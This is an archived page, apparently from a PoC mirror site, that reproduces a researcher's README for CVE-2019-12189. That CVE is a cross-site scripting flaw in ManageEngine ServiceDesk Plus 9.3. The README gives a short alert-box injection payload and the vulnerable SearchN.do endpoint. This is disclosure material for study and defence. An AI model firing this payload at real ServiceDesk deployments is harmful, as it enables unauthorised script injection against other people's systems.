Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-12189 PoC — ZOHO ManageEngine ServiceDesk Plus 跨站脚本漏洞

Source
https://github.com/falconz/CVE-2019-12189
Associated Vulnerability
Title:ZOHO ManageEngine ServiceDesk Plus 跨站脚本漏洞 (CVE-2019-12189)
Description:An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field.
Readme
# CVE-2019-12189 - Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability 

Information
Description:XSS was discovered in ManageEngine ServiceDesk Plus version
Versions Affected: 9.3
Researcher: Dang The Tuyen

# Proof-of-concept
The vulnerability stems from the confusion of both single quotes and semicolon in the query string of the URL.

payload: ';alert('XSS');'
Attack vector: http://<domain>/SearchN.do

# Screenshot

![Alt text](https://github.com/falconz/CVE-2019-12189/blob/master/1.jpg?raw=true "Optional title")
![Alt text](https://github.com/falconz/CVE-2019-12189/blob/master/2.jpg?raw=true "Optional title")
File Snapshot

 [4.0K]  /data/pocs/e97ff27d3a5c5e259e4d1883964a62277b4dd1ed
├── [139K]  1.jpg
├── [ 60K]  2.jpg
└── [ 626]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →